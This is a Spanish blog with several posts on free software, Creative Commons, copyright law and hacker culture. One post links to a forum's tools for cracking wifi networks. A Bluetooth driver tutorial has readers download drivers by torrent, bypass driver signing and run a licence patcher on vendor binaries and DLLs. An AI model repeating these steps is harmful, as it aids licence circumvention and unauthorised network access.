Se creativo

Este es el eslogan de las licencias Creative commons. Son unas licencias que reservan a los artistas ciertos derechos sobre sus obras pero a la vez les otorgan ciertos permisos a aquellas personas que las quieran utilizar.

Sus premisas son:

Usted es libre de:

- Copiar, distribuir y comunicar públicamente la obra
- Hacer obras derivadas

Bajo las condiciones siguientes:

-Reconocimiento — Debe reconocer los créditos de la obra de la manera especificada por el autor o el licenciador (pero no de una manera que sugiera que tiene su apoyo o apoyan el uso que hace de su obra).

- No comercial — No puede utilizar esta obra para fines comerciales.

- Compartir bajo la misma licencia — Si altera o transforma esta obra, o genera una obra derivada, sólo puede distribuir la obra generada bajo una licencia idéntica a ésta.



En este enlace podemos ver un video que nos explica mejor de que va esto:

Se creativo

Perdonar por ser tan escueto pero mejor lo explica este enlace que yo.

P.D. Si le ha gustado la entrada por favor coméntela, para que no parezca que escribimos esto para nadie. Gracias.

En defensa de los derechos fundamentales en Internet


  1. Los derechos de autor no pueden situarse por encima de los derechos fundamentales de los ciudadanos, como el derecho a la privacidad, a la seguridad, a la presunción de inocencia, a la tutela judicial efectiva y a la libertad de expresión.

  2. La suspensión de derechos fundamentales es y debe seguir siendo competencia exclusiva del poder judicial. Ni un cierre sin sentencia. Este anteproyecto, en contra de lo establecido en el artículo 20.5 de la Constitución, pone en manos de un órgano no judicial -un organismo dependiente del ministerio de Cultura-, la potestad de impedir a los ciudadanos españoles el acceso a cualquier página web.

  3. La nueva legislación creará inseguridad jurídica en todo el sector tecnológico español, perjudicando uno de los pocos campos de desarrollo y futuro de nuestra economía, entorpeciendo la creación de empresas, introduciendo trabas a la libre competencia y ralentizando su proyección internacional.


  4. La nueva legislación propuesta amenaza a los nuevos creadores y entorpece la creación cultural. Con Internet y los sucesivos avances tecnológicos se ha democratizado extraordinariamente la creación y emisión de contenidos de todo tipo, que ya no provienen prevalentemente de las industrias culturales tradicionales, sino de multitud de fuentes diferentes.

  5. Los autores, como todos los trabajadores, tienen derecho a vivir de su trabajo con nuevas ideas creativas, modelos de negocio y actividades asociadas a sus creaciones. Intentar sostener con cambios legislativos a una industria obsoleta que no sabe adaptarse a este nuevo entorno no es ni justo ni realista. Si su modelo de negocio se basaba en el control de las copias de las obras y en Internet no es posible sin vulnerar derechos fundamentales, deberían buscar otro modelo.

  6. Consideramos que las industrias culturales necesitan para sobrevivir alternativas modernas, eficaces, creíbles y asequibles y que se adecuen a los nuevos usos sociales, en lugar de limitaciones tan desproporcionadas como ineficaces para el fin que dicen perseguir.

  7. Internet debe funcionar de forma libre y sin interferencias políticas auspiciadas por sectores que pretenden perpetuar obsoletos modelos de negocio e imposibilitar que el saber humano siga siendo libre.


  8. Exigimos que el Gobierno garantice por ley la neutralidad de la Red, en España ante cualquier presión que pueda producirse, como marco para el desarrollo de una economía sostenible y realista de cara al futuro.

  9. Proponemos una verdadera reforma del derecho de propiedad intelectual orientada a su fin: devolver a la sociedad el conocimiento, promover el dominio público y limitar los abusos de las entidades gestoras.

  10. En democracia las leyes y sus modificaciones deben aprobarse tras el oportuno debate público y habiendo consultado previamente a todas las partes implicadas. No es de recibo que se realicen cambios legislativos que afectan a derechos fundamentales en una ley no orgánica y que versa sobre otra materia.


Este manifiesto, elaborado de forma conjunta por varios autores, es de todos y de ninguno. Se ha publicado en multitud de sitios web. Si estás de acuerdo y quieres sumarte a él, difúndelo por Internet.

Fuente: Microsiervos

Hay muchas cosas si se sabe buscar

Vale, pues sigo inssitiendo en lo mismo, si buscamos bien hay muchas cosas, foros y demás, que nos pueden ayudar a "reventar" wifi (y sigo insistiendo, cada uno que haga lo que vea, esto es solo a titulo informativo).

Bien pues en el foro de www.seguridadwirelless.net he encontrado un apartado para los negados en linux y es todo tipo de software para windows y demás, no me voy a poner a explicarlo todo, porque sino serían páginas y páginas, pero lo que deben hacer es entrar y echarle un vistazo, porque así es como se aprende de todo esto.

En fin el enlace generico es: http://foro.seguridadwireless.net/enlaces-descarga-aplicaciones-wireless-windows/

y el especifico (como un recopilatorio): http://foro.seguridadwireless.net/enlaces-descarga-aplicaciones-wireless-windows/software-bajo-windows-%28varios-recopilatorio%29/

SALUDOXXXX_____________SHAK

Telebision

Hoy me gustaría presentar un proyecto open source basado en XBMC llamado Telebision.

XBMC es un media center de los que permiten ver películas y/o escuchar música que tengamos en el pc u online con un interfaz muy cuidada, de las que dan ganas de no cerrar.

Telebision es una adaptación de XBMC al español. Su punto fuerte, y por lo que a mí me gusta, es porque incorpora un sistema de complementos más que interesantes: permite conectarse desde el propio media center a sitios tan conocidos como Youtube, SeriesYonkis, PeliculasYonkis o RojaDirecta y manejar los contenidos de dichos sitios bajo un mismo interfaz.

Para descargarlo desde su página oficial: wiki de Telebision

Si queréis ver un análisis en video del mismo hecho por la gente de xataka os paso un enlace al mismo: Analisis en video de xataka

Si lo instaláis, no dudéis en comentar qué os parece la aplicación y le vamos dando difusión.

Hackers, crackers, seguridad y libertad

Los hackers y su cultura son una de las fuentes esenciales de la invención y continuo desarrollo de Internet. Los hackers no son lo que los medios de comunicación o los gobiernos dicen que son. Son, simplemente, personas con conocimientos técnicos informáticos cuya pasión es inventar programas y desarrollar formas nuevas de procesamiento de información y comunicación electrónica (Levy, 1984; Raymond, 1999). Para ellos, el valor supremo es la innovación tecnológica informática. Y, por tanto, necesitan también libertad. Libertad de acceso a los códigos fuente, libertad de acceso a la red, libertad de comunicación con otros hackers, espíritu de colaboración y de generosidad (poner a disposición de la comunidad de hackers todo lo que se sabe, y, en reciprocidad, recibir el mismo tratamiento de cualquier colega). Algunos hackers son políticos y luchan contra el control de los gobiernos y de las corporaciones sobre la red, pero la mayoría no lo son, lo importante para ellos es la creación tecnológica. Se movilizan, fundamentalmente, para que no haya cortapisas a dicha creación. Los hackers no son comerciales, pero no tienen nada contra la comercialización de sus conocimientos, con tal de que las redes de colaboración de la creación tecnológica sigan siendo abiertas, cooperativas y basadas en la reciprocidad.

La cultura hacker se organiza en redes de colaboración en Internet, aunque de vez en cuando hay algunos encuentros presenciales. Distintas líneas tecnológicas se agrupan en torno a grupos cooperativos, en los cuales se establece una jerarquía tecnológica según quiénes son los creadores de cada programa original, sus mantenedores y sus contribuidores. La comunidad suele reconocer la autoridad de los primeros innovadores, como es el caso de Linus Torvalds en la comunidad Linux. Pero sólo se reconoce la autoridad de quien la ejerce con prudencia y no la utiliza para su beneficio personal.

El movimiento hacker más político (en términos de política de libertad tecnológica) es el creado por Richard Stallman, un programador de MIT, que constituyó en los años ochenta la Free Software Foundation para defender la libertad de acceso a los códigos de UNIX cuando ATT trató de imponer sus derechos de propiedad sobre UNIX, el sistema operativo más avanzado y más compatible de su tiempo, y sobre el que se ha fundado en buena parte la comunicación de los ordenadores en la red. Stallman, que aprendió el valor de la libertad en el movimiento de libre expresión en sus tiempos de estudiante en Berkeley, sustituyó el copy right por el copy left. Es decir, que cualquier programa publicado en la red por su Fundación podía ser utilizado y modificado bajo licencia de la Fundación bajo una condición: difundir en código abierto las modificaciones que se fueran efectuando. Sobre esa base, desarrolló un nuevo sistema operativo, GNU, que sin ser Unix, podía utilizarse como UNIX. En 1991, un estudiante de 21 años de la Universidad de Helsinki, Linus Torvalds, diseñó su propio UNIX kernel para su PC 386 sobre la base de Fundación. Y, siguiendo las reglas del juego, publicó la fuente de su código en la red, solicitando ayuda para perfeccionarlo. Cientos de programadores espontáneos se pusieron a la tarea, desarrollando así el sistema operativo Linux (que recibió ese nombre del administrador del sistema en la Universidad de Helsinki, puesto que el nombre que Torvalds le había dado era el de Freix), considerado hoy en día el más avanzado del mundo, sobre todo para ordenadores en Internet, y la única alternativa actual a los programas de Microsoft. Linux cuenta en la actualidad con más de 30 millones de usuarios y está siendo promocionado por los gobiernos de Francia, de Brasil, de la India, de Chile, de China, entre otros, así como por grandes empresas como IBM. Siempre en código abierto y sin derechos de propiedad sobre él.

El filósofo finlandés Pekka Himanen (www.hackerethic.org) argumenta convincentemente que la cultura hacker es la matriz cultural de la era de la información, tal y como la ética protestante fue el sistema de valores que coadyuvó decisivamente al desarrollo del capitalismo, según el análisis clásico de Max Weber. Naturalmente, la mayoría de los capitalistas no era protestante ni la mayoría de los actores de la sociedad de la informacion es hacker. Pero lo que esto significa es lo siguiente: una gran transformación tecnoeconómica necesita un caldo de cultivo en un sistema de valores nuevo que motive a la gente para hacer lo que hace. En el caso del capitalismo, fue la ética del trabajo y de la acumulación de capital en la empresa como forma de salvación personal (lo cual, desde luego, no impidió, sino que justificó, la explotación de los trabajadores).

En la era de la información, la matriz de todo desarrollo (tecnológico, económico, social) está en la innovación, en el valor supremo de la innovación que, potenciada por la revolución tecnológica informacional, incrementa exponencialmente la capacidad de generación de riqueza y de acumulación de poder. Pero innovar no es un valor obvio. Debe estar asociado a una satisfacción personal, del tipo que sea, ligado al acto de la innovación. Eso es la cultura hacker, según Himanen. El placer de crear por crear. Y eso mueve el mundo, sobre todo el mundo en que la creación cultural, tecnológica, científica y también empresarial, en su aspecto no crematístico, se convierte en fuerza productiva directa por la nueva relación tecnológica entre conocimiento y producción de bienes y servicios. Se podría argumentar que, así definido, hay hackers en todas partes y no sólo en la informática. Y ése es, en realidad, el argumento de Himanen: que todo el mundo pueder ser hacker en lo que hace y que cualquiera que esté movido por la pasión de crear en su actividad propia está motivado por una fuerza superior a la de la ganancia económica o la satisfacción de sus instintos. Lo que ocurre es que la innovación tecnológica informática tiene el piñón directo sobre la rueda del cambio en la era de la información, de ahí que la cultura hacker se manifieste de forma particularmente espectacular en las tecnologías de información y en Internet.

En realidad, los hackers han sido fundamentales en el desarrollo de Internet. Fueron hackers académicos quienes diseñaron los protocolos de Internet. Un hacker, Ralph Tomlinson, trabajador de la empresa BBN, inventó el correo electrónico en 1970, para uso de los primeros internautas, sin comercialización alguna. Hackers de los Bell Laboratories y de la Universidad de Berkeley desarrollaron UNIX. Hackers estudiantes inventaron el módem. Las redes de comunicación electrónica inventaron los tablones de anuncio, los chats, las listas electrónicas y todas las aplicaciones que hoy estructuran Internet. Y Tim Berners-Lee y Roger Cailliau diseñaron el browser/editor World Wide Web, por la pasión de programar, a escondidas de sus jefes en el CERN de Ginebra, en 1990, y lo difundieron en la red sin derechos de propiedad a partir de 1991. También el browser que popularizó el uso del World Wide Web, el Mosaic, fue diseñado en la Universidad de Illinois por otros dos hackers (Marc Andreesen y Eric Bina) en 1992. Y la tradición continúa: en estos momentos, dos tercios de los servidores de web utilizan Apache, un programa servidor diseñado y mantenido en software abierto y sin derechos de propiedad por una red cooperativa.

En una palabra, los hackers informáticos han creado la base tecnológica de Internet, el medio de comunicación que constituye la infraestructura de la sociedad de la información. Y lo han hecho para su propio placer, o, si se quiere, por el puro goce de crear y compartir la creación y la competición de la creación. Ciertamente, unos pocos de entre ellos también se hicieron ricos como empresarios, pero mediante aplicaciones de sus innovaciones, no mediante la apropiación de la innovación cooperativa en su propio beneficio (aunque el caso de Andreesen es menos claro, en este sentido). Otros obtuvieron buenos puestos de trabajo, pero sin ceder en sus principios como hackers. También hubo quien se hizo famoso, como Linus Torvalds, pero su fama vino de su reconocimiento de la comunidad de hackers, que implica el respeto a sus reglas de libertad y cooperación. Los más permanecieron anónimos para el mundo y llevan y llevaron una vida modesta. Pero obtuvieron, mediante su práctica de innovación cooperativa, la más alta recompensa a la que aspira un hacker, el reconocimiento como tal por parte de la única autoridad que puede otorgar dicha distinción: la comunidad global de hackers, fuente esencial de innovación en la era de la información.

En los márgenes de la comunidad hacker se sitúan los crackers. Los crackers, temidos y criticados por la mayoría de hackers, por el desprestigio que les supone ante la opinión pública y las empresas, son aquellos que utilizan sus conocimientos técnicos para perturbar procesos informáticos (Haffner y Markoff, 1995).

Hay muy distintos tipos de crackers, pero no considero entre ellos a aquellos que penetran en ordenadores o redes de forma ilegal para robar: éstos son ladrones de guante blanco, una vieja tradición criminal. Muchos crackers pertenecen a la categoría de script kiddies, es decir, bromistas de mal gusto, muchos de ellos adolescentes, que penetran sin autorización en sistemas o crean y difunden virus informáticos para sentir su poder, para medirse con los otros, para desafiar al mundo de los adultos y para chulear con sus amigos o con sus referentes en la red. La mayoría de ellos tiene conocimientos técnicos limitados y no crea ninguna innovación, por lo que son, en realidad, marginales al mundo hacker. Otros crackers, más sofisticados, penetran en sistemas informáticos para desafiar personalmente a los poderes establecidos, por ejemplo, a Microsoft o las grandes empresas. Y algunos utilizan su capacidad tecnológica como forma de protesta social o política, como expresión de su crítica al orden establecido. Ellos son quienes se introducen en sistemas militares, administraciones públicas, bancos o empresas para reprocharles alguna fechoría. Entre los ataques de crackers con motivación política hay que situar los practicados por movimientos políticos o por servicios de inteligencia de los gobiernos, como la guerra informática desarrollada entre los crackers islámicos e israelíes o entre los pro-chechenos y los servicios rusos.

En suma, en la medida en que los sistemas informáticos y las comunicaciones por Internet se han convertido en el sistema nervioso de nuestras sociedades, la interferencia con su operación a partir de una capacidad técnica de actuación en la red es un arma cada vez más poderosa, que puede ser utilizada por distintos actores y con distintos fines. Éstas son las acciones de los crackers, que deben ser absolutamente deslindados de los hackers, a cuya constelación pertenecen, pero con quienes no se confunden.

La vulnerabilidad de los sistemas informáticos plantea una contradicción creciente entre seguridad y libertad en la red. Por un lado, es obvio que el funcionamiento de la sociedad y sus instituciones y la privacidad de las personas no puede dejarse al albur de cualquier acción individual o de la intromisión de quienes tienen el poder burocrático o económico de llevarla a cabo. Por otro lado, como ocurre en la sociedad en general, con el pretexto de proteger la información en la red se renueva el viejo reflejo de control sobre la libre comunicación.

El debate sobre seguridad y libertad se estructura en torno a dos polos: por un lado, la regulación político-jurídica de la red; por otro, la autoprotección tecnológica de los sistemas individuales. Naturalmente, hay fórmulas intermedias, pero, en general, dichas fórmulas mixtas tienden a gravitar hacia la regulación institucional de la comunicación electrónica. Quienes defienden la capacidad de autorregulación de la red argumentan que existen tecnologías de protección que son poco vulnerables, sobre todo cuando se combinan los fire walls (o filtros de acceso) de los sistemas informáticos con las tecnologías de encriptación, que hacen muy difíciles de interceptar los códigos de acceso y el contenido de la comunicación. Es así como están protegidos los ordenadores del Pentágono, de los bancos suizos o de Scotland Yard. La mayor parte de las instituciones de poder y de las grandes empresas tiene sistemas de seguridad a prueba de cualquier intento de penetración que no cuente con capacidad tecnológica e informática similar. Cierto que hay una carrera incesante entre sistemas de ataque informático y de protección de éstos, pero por esto mismo, el corazón de dichos sistemas es poco vulnerable para el común de los hackers.

Ahora bien, al estar los sistemas informáticos conectados en red, la seguridad de una red depende en último término de la seguridad de su eslabón más débil, de forma que la capacidad de penetración por un nodo secundario puede permitir un ataque a sus centros más protegidos. Esto fue lo que ocurrió en el año 2000 cuando los crackers se introdujeron en el sistema de Microsoft y obtuvieron códigos confidenciales, a partir de la penetración en el sistema personal de un colaborador de Microsoft que tenía acceso a la red central de la empresa. Es manifiestamente imposible proteger el conjunto de la red con sistemas de fire walls y encriptación automática. Por ello, sólo la difusión de la capacidad de encriptación y de autoprotección en los sistemas individuales podría aumentar la seguridad del sistema en su conjunto. En otras palabras, un sistema informático con capacidad de computación distribuida en toda la red necesita una protección igualmente distribuida y adaptada por cada usuario a su propio sistema. Pero eso equivale a poner en manos de los usuarios el poder de encriptación y autoprotección informática. Algo que rechazan los poderes políticos con el pretexto de la posible utilización de esta capacidad por los criminales (en realidad, las grandes organizaciones criminales tienen la misma capacidad tecnológica y de encriptación que los grandes bancos). En último término, la negativa de las administraciones a permitir la capacidad de encriptación y de difusión de tecnología de seguridad entre los ciudadanos conlleva la creciente vulnerabilidad de la red en su conjunto, salvo algunos sistemas absolutamente aislados y, en última instancia, desconectados de la red.

De ahí que gobiernos y empresas busquen la seguridad mediante la regulación y la capacidad represiva de las instituciones más que a través de la autoprotección tecnológica de los ciudadanos. Es así como se reproduce en el mundo de Internet la vieja tensión entre seguridad y libertad.

Autor: Manuel Castells
texto sacado: http://www.uoc.es/web/esp/launiversidad/inaugural01/hackers.html

Gimp - Alternativa a Photoshop

Mucha gente que conozco es aficionada al retoque fotográfico, bien para cachondeo, bien en plan creativo. Para ellos el buque insignia es el Adobe Photoshop y a mí me gustaría comentar un programa tan válido como éste y bajo licencia libre, aún sin ser un experto en el tema del retoque, por lo que he tenido que recurrir a la wikipedia (GIMP) para completar la información.

GIMP (GNU Image Manipulation Program) es una aplicación de diseño y retoque de imágenes capaz de trabajar a varias capas y leer ficheros .jpg, .gif, imágenes vectoriales, importar .pdf e incluso ficheros nativos de Photoshop, por lo que la migración de uno a otro no es nada difícil.

Aunque es un programa pensado para utilizarse bajo Linux http://www.gimp.org/, todos los que tenemos un sistema operativo Windows lo podemos descargar de: http://the-gimp.softonic.com/ para instalarlo.

Su interfaz es bastante intuitiva, sencilla de utilizar y traducida al español e incluso existen versiones con la misma interfaz del Photoshop como GIMPShop o GimpPhoto, para aquellos a los que no les gusta que les cambien los iconos de sitio.

Si alguien se anima a instalarlo y no sabe por donde empezar, existen multitud de tutoriales en internet (como para casi todo) en los que se explica como utilizarlo e incluso foros dedicados a ello. Para muestra un botón Efectos en GIMP.

Os animo a que lo descarguéis, lo probéis y dejéis comentarios para que la gente se vaya animando.

Instalación de Java en tu ordenador.

Bueno este post espero que os sirva para poder instalar java en vuestro ordenador.

Paso 1.


Descargar jsdk con el que tendremos todo lo necesario para compilar y ejecutar nuestras aplicaciones. Aquí dejo un enlace:


https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start?ProductRef=jdk-6u14-javafx-1.2-oth-JPR@CDS-CDS_Developer

Esta es la versión 1.6.0_14


Una vez descargar ejecutar el archivo .exe y seguir las instrucciones de instalación.


Paso 2.


Ya solo nos queda añadir cambiar las variables de entorno de nuestro sistema.

Entramos en Panel de Control/Sistema/opciones avanzadas

Pinchamos en variables de entorno:


A continuación en variables de entorno modificamos el path añadiendo (depende de la versión), en nuestro caso:


c:\Archivos de programa\Java\jsdk1.6.0_14\bin

Ruta del directorio bin de java.



Ya solo nos queda añadir en variables de entorno el CLASSPATH.

Si no existe le damos a nuevo y creamos una variable CLASSPATH, con la siguiente ruta:


C:\Archivo de programa\Java\jsdk1.6.0_14\lib



Si existe solo modificarla añadiendole la ruta anterior.


Espero que sirva de ayuda, para cualquier duda comentarmelo y si puedo os lo intentare solucionar.


P.D: Creo que no he utilizado un lenguaje muy tecnico, pero que queda claro lo que hay que hacer.


Nevo Proyecto

Bien pues resulta que este verano voy intentar crear una antena wifi, mediante una parabólica de televisión por satélite.

La verdad que ahora mismo ando perdido, y tengo que recopilar mucha información, y la verdad toda ayuda es poca, así que si os da por buscar y encontrais información, pues mandarme enlace a mi mail o por akí vale????

Bueno chicos un saludo para todos.

Instalar drivers de bluetooth widcomm en windows vista

Todos aquellos que tenéis un equipo con windows vista y un dispositivo bluetooth os habréis dado cuenta de lo frustrante que es utilizarlo con los drivers que proveen los amigos de Microsoft.

Yo soy uno de tantos que tengo un bluetooth por USB que solo tiene drivers para Windows XP (que ya han sido descontinuados) y cada vez que quería pasar las fotos del móvil al PC sin usar los cables ni el programa para PC del teléfono en windows vista, me he encontrado con que tengo que autorizar cada envío manualmente como consecuencia de los drivers nativos, lo que resulta un auténtico tostón ya que hay que estar todo el rato pendiente del pc y es casi más cómodo enchufarlo con el cable.

Pues ayer estaba un poco aburrido, me puse a arreglar esto e instalé los drivers del cacharrito en su version para windows vista, lo cual no es muy intuitivo y voy a dejar escrito lo que hice, para todo aquel que quiera probar. Yo he usado los drivers del mismo proveedor que originalmente creó los de mi usb, aunque como éstos son muy generalistas y se usaron en otros muchos dispositivos, posiblemente funcionen bien para casi todos.

Lo primero y fundamental es encontrar los drivers que se van a instalar en lugar de los de microsoft, junto con la herramienta que autorizará al pc a usarlos. Todo esto me lo encontré en un único archivo torrent que hay que descargarse con el Ares, por poner un gestor de torrents, y posteriormente descomprimir: http://www.mininova.org/get/1012248.
Para los más curiosos decir que los drivers son los de Widcomm en su versión 5.1.0.1100. Las versiones posteriores probablemente no servirán ya que dejaron de fabricar drivers que sirvieran a hardware de terceros.

Una vez que se disponga de los ficheros empieza el meollo, la guía la he sacado combinando la que viene en el propio fichero de la descarga y la que hay en http://www.thinkdigit.com/forum/archive/index.php/t-65069.html.
Hay que tener en cuenta si se tiene un sistema operativo de 32 bits o de 64 bits, ya que el proceso cambia un poco, aunque lo dejaré reflejado.

El proceso se divide en una serie de pasos:
1.Evitar que windows vista instale sus drivers por defecto.
2.Averiguar si los nuevos drivers son compatibles con nuestro tipo de dispositivo.
3.(Opcional) Forzar la compatibilidad.
4.Desinstalar drivers bluetooth originales.
5.Instalar drivers nuevos.
6.Autorizar el equipo para usar los drivers.
7.Disfrutar de un bluetooth funcional.

1.Evitar que windows vista instale sus drivers por defecto.
Lo primero que hay que hacer es tener pleno acceso a los archivos del sistema. Hay que ir al panel de control > Apariencia y Personalización y pulsar en “Mostrar todos los archivos y carpetas ocultos” debajo del menú “Opciones de Carpeta”. Se tiene que marcar “Mostrar todos los archivos y carpetas ocultos” y desmarcar “Ocultar archivos protegidos del sistema operativo (Recomendado)” y “Ocultar las extensiones de archivo para tipos de archivos conocidos”.

Seguidamente hay que ir a la ruta “C:\Windows\inf” y renombrar los ficheros “bth.inf” y “bth.pnf” a “bth.inf.bak” y “bth.pnf.bak”.

2.Averiguar si los nuevos drivers son compatibles con nuestro tipo de dispositivo.
Para esto, hay que tener conectado el bluetooth a la máquina (los que lo tengan interno, no tienen que hacer nada ;P). Una vez conectado, se hace clic derecho en “Equipo” (“Mi PC”en windows XP) y al ver las “propiedades”, se accede al “Administrador de dispositivos” y dentro del árbol de dispositivos se despliega el submenú de “radio bluetooth” (si está instalado el driver de bluetooth) u “otros dispositivos” (si no está instalado). Se hace doble clic en “Bluetooth Device” (el nombre cambia dependiendo del fabricante del dispositivo) y en la pestaña “Detalles” se despliega la propiedad “Id del hardware” y se apunta en un papel la entrada “USB\VID_XXXX&PID_XXXX” donde las XXXX son cuatro dígitos hexadecimales. Puede que además de la entrada VID y PID aparezca una REV; pero las que interesan son las dos anteriores.

Ahora hay que dirigirse al directorio donde se han descomprimido los drivers descargados y acceder a la carpeta ./widcom/Win32 (./widcom/Win64 para los que tienen vista 64 bits) para abrir el fichero “btwusb.inf” y buscar la línea que contiene el dato de “VID_XXXX” y “PID_XXXX” que se ha apuntado anteriormente (tienen que estar en la misma línea).

Si se ha encontrado dicha línea se puede proceder directamente con el paso 4, ya que el 3º es para los que no encuentran la entrada de su dispositivo en el fichero.

3.(Opcional) Forzar la compatibilidad.
Si no hay una entrada con el dispositivo que queremos instalar, no quiere decir que ya no se pueda hacer, siempre se puede intentar forzar el sistema para instalar los drivers. Si la jugada nos sale bien pues a disfrutar, en caso contrario pues como se suele decir: “nada tenía y nada tengo”.

Si no existe la entrada para el “VID_XXXX&PID_XXXX” del dispositivo bluetooth en el fichero, lo que hay que hacer es crear una válida y esto se consigue insertando una línea debajo del epígrafe [ControlFlags] como las que ya contiene, pero con los datos del dispositivo bluetooth a instalar, es decir, una línea como: ExcludeFromSelect=USB\VID_XXXX&PID_XXXX, cambiando las XXXX por los valores tomados anteriormente del administrador de dispositivos.

Seguidamente hay que buscar el epígrafe [WIDCOMM.NTx86.5.1] ([WIDCOMM.NTamd64] para los usuarios de SS.OO de 64 bits) y añadir una línea como: “%****.DeviceDesc%=BTWUSB, USB\VID_XXXX&PID_XXXX ; Mi BT USB”, donde **** es una palabra en MAYUSCULAS (recomiendo usar el nombre del fabricante del dispositivo bluetooth) y las XXXX son los valores apuntados a los que ya se ha hecho referencia antes.

Por último, salvar y cerrar el fichero.

4.Desinstalar drivers bluetooth originales.
Pues el título es bastante explicativo, ¿no? Hay que ir al administrador de dispositivos y desinstalar todo lo que tenga relación con el bluetooth para, posteriormente extraer el usb del equipo, si es externo y reiniciar el pc.

IMPORTANTE: los usuarios de windows vista 64 bits tendrán que pulsar F8 cada vez que reinicien su máquina después de la carga de la BIOS para arrancar con la opción “Disable Driver Signing Enforcment”, de otra forma no podrán instalar drivers sin firmar como es el caso de los que se usan en este tutorial.

5.Instalar drivers nuevos.
Una vez reiniciado el equipo hay que dirigirse de nuevo al directorio donde se han descomprimido los drivers descargados, acceder a la carpeta ./widcom/Win32 (./widcom/Win64 para los que tienen vista 64 bits) y ejecutar Inst.exe (no Setup.exe) para instalar los nuevos drivers. Como los drivers están sin firmar, el UAC preguntará unas 11 veces si se está seguro de lo que se está haciendo, a lo que habrá que mentirle y decirle que sí.

Cuando se termina la instalación aparecerá un icono de bluetooth en la barra de tareas con el símbolo en rojo y en el escritorio aparecerá el icono de “Mis sitios de Bluetooth”.

6.Autorizar el equipo para usar los drivers.
Como estos drivers recién instalados no vinieron en un cd junto con el dispositivo bluetooth ya que por entonces solo existía windows XP, considero que no tengo que pagar por una licencia de los mismos al querer usar los drivers del mismo proveedor en windows vista; pero hay que asegurarse de que no va a haber problemas de uso a posteriori. Así que hay que autorizar al pc para que use esos drivers.

Una vez instalados los drivers hay que reiniciar en modo a prueba de fallos con red. Esto se hace reiniciando como siempre y pulsando F8 después de la carga de la BIOS para que aparezca el menú que permite seleccionar dicha opción.
Cuando ya se ha arrancado el sistema, hay que ir al directorio donde se descomprimió el fichero descargado con el Ares y acceder a la carpeta “./Widcomm Licence Patcher v2”, donde está el Widcomm_patcher_v2.exe. Ejecutar dicho programa. Hay algunas versiones de vista (como la mía) que no deja ejecutar programas cuyo nombre contenga la palabra “patcher” y para que no dé problemas hay que renombrar el fichero a Widcomm_v2.exe.

El programa hace su función en 4 pasos, solicitando en cada uno de ellos un fichero concreto que hay que buscar, seleccionar y pulsar OK: el primero es “BTStackServer.exe”, ubicado en “C:\Program Files\WIDCOMM\Bluetooth Software”, el segundo es “BTTray.exe”, en la misma ruta. Los otros dos son librerías .dll ubicadas en “C:\Windows\System32\”, a los que no se les podrá hacer nada en esa ruta. Habrá que copiarlas en c:\ (por ejemplo) y actuar sobre ellas desde ahí para luego sobreescribir los que están en “C:\Windows\System32\”, no sin antes hacer una copia de seguridad de los ficheros.
Cuando se haya terminado con los cuatro archivos, hay que reiniciar el pc, con la salvedad ya mencionada para los que tengan un windows vista de 64 bits.

7.Disfrutar de un bluetooth funcional.
Una vez reiniciado, hay que insertar el bluetooth USB en el equipo o darle a “agregar nuevo hardware” en el panel de control si es un bluetooth interno para que comience a instalar los drivers. Como no los va a encontrar, solicitará al usuario que especifique una ruta donde estén:“C:\Program Files\WIDCOMM\Bluetooth Software\bin”.
Cuando la instalación finalice se podrá observar que el icono de bluetooth ha pasado de rojo a blanco y ya se podrá disfrutar de un bluetooth mucho más funcional.

Si alguna vez alguien quiere volver al anterior controlador de windows sólo tiene que desinstalar los drivers instalados en este tutorial y restaurar las librerías .dll originales.

Uno de los mejores exponentes open source

Una de la utilidades que prácticamente todos tenemos en nuestro equipo es una suite ofimática. De hecho, me atrevería a decir que la mayoría de los que leen estas líneas tiene instalado el Microsoft Office.

Hoy me gustaría presentar una referencia a uno de los mejores esfuerzos de software libre de amplia difusión: openoffice.org - http://es.openoffice.org/
Los programas contenidos de esta suite son: Writer (Word), Calc (Excel), Impress (PowerPoint), Base (Access), Draw (Visio) y Math (Microsoft Equation Editor). Todos ellos tienen la misma funcionalidad que sus respectivos competidores (y ubicada bajo los mismos nombres), junto con la capacidad, por ejemplo, de exportar documentos directamente a PDF, hacer presentaciones en flash sin necesidad de tener que buscar e instalar un plugin que lo haga o guardar los datos en un formato libre estándar.

Este software goza de una gran vitalidad y sigue en continuo perfeccionamiento, por lo que las actualizaciones se van descargando automáticamente de forma periódica, cosa que no tienen los office de no-pago.

Como la mejor manera de que la gente haga el cambio es escuchar que a otros les va bien con él, si alguien quiere darle una oportunidad, sus comentarios serán bienvenidos.

Alternativas libres

Voy a apuntar unas webs que sirven para buscar alternativas de código abierto a software propietario.
Estas webs son básicamente una base de datos con un buscador. Cuando se les introduce en el buscador una aplicación privativa se devuelve una lista de aplicaciones libres con una puntuación de su calidad y un link a la página oficial donde descargarla.

Para que, cuando alguien piense en adquirir algo propietario, se dé primero una vuelta y busque, ya que lo mismo se encuentra con una sorpresa:

- Alternativas libres (en español, muy útil): http://www.freealts.com/
- Osalt (también en español): http://www.osalt.com/es/
- AlternativeTo (en inglés): http://alternativeto.net/

¿Cómo se utilizan estas webs? Es muy sencillo, se introduce en el buscador el programa al que se desea buscar su alter ego open source (p.ej.: "photoshop") y te devuelve la lista de alternativas al programa.

Aparece otro: Asterix

Como en todos los sitios a los que se entra, es de buena educación presentarse y decir a que se ha venido. Bien, soy Asterix y mi intención es la de echarle una mano al amigo Shak, dando a conocer esas herramientas de código abierto (con licencia de distribución libre o no) que se pueden utilizar en lugar de las tan manidas aplicaciones de pago que casi todos hemos tenido alguna vez en nuestro equipo.

La información que pongo, si no es mía, normalmente saldrá de páginas como barrapunto.com o www.genbeta.com. Lo dejo dicho para que a nadie le siente mal.

Todos los que leen este blog tienen una idea aproximada de lo que es el código abierto, así que lo que voy a hacer es dar mi opinión de cómo yo lo veo.

Cualquier programa de código abierto que se genera, parte de la idea desinteresada de unas personas que opinan que las tareas domésticas de la informática deberían realizarse sin tener que casarse con un fabricante de software y sin un desembolso adicional, que bastante caro es ya el equipo. Ese grupo de personas se reúne y dedican muchas horas de su tiempo a un trabajo cuya mayor recompensa será las gracias de muchos usuarios y los donativos de algunos.
Bajo este punto de vista, lo que quiero transmitir es que a esa gente que se dedica a hacer software libre hay que darles apoyo para que continúen con su trabajo y la mejor forma de apoyarles es utilizando su software.
Ni que decir tiene que conforme se está poniendo el asunto de los derechos de autor, es mucho más aconsejable utilizar software libre que crackear uno propietario. A ver si así se dan cuenta de que no todo lo que ponemos en los cedés y deuvedés es pirateo y nos quitan el MALDITO CANON de una vez.

El Sr. Txin aportando información

